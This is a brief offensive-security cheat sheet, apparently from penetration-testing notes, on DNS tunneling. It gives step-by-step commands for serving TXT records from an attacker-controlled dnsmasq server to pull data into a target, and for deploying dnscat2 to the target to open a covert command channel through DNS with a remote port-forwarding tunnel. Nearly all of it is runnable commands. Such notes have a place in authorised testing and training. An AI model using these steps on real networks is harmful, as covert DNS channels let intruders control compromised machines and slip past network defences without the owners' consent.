4. DNS Tunneling

Manual DNS TXT Record Infiltration with dnsmasq:

  1. Edit 'dnsmasq_txt.conf' on controlled dnsmasq server. Example:
# TXT record
txt-record=www.feline.corp,here's something useful!
txt-record=www.feline.corp,here's something else less useful.
  1. Start dnsmaq:
sudo dnsmasq -C dnsmasq_txt.conf -d
  1. Check that DNS requests are properly routed on target:
resolvectl status
  1. Run a TXT resolution from the target to the server:
nslookup -type=txt www.feline.corp

DNS Tunneling with dnscat2:

  1. Start dnscat2-server on your authorative DNS server:
dnscat2-server <domain>
  1. Transfer the dnscat binary to the target from: https://github.com/iagox86/dnscat2
  2. Start the clients and connect them:
./dnscat --secret=<secret> <domain>
  1. Enter your initiated window from the server:
#List active windows:
windows

#Enter the window:
window -i 1
  1. Set up remote port forwarding tunnel:
listen 0.0.0.0:2345 <outip>:<outport>
  1. Use tunnel with server port and ip = win!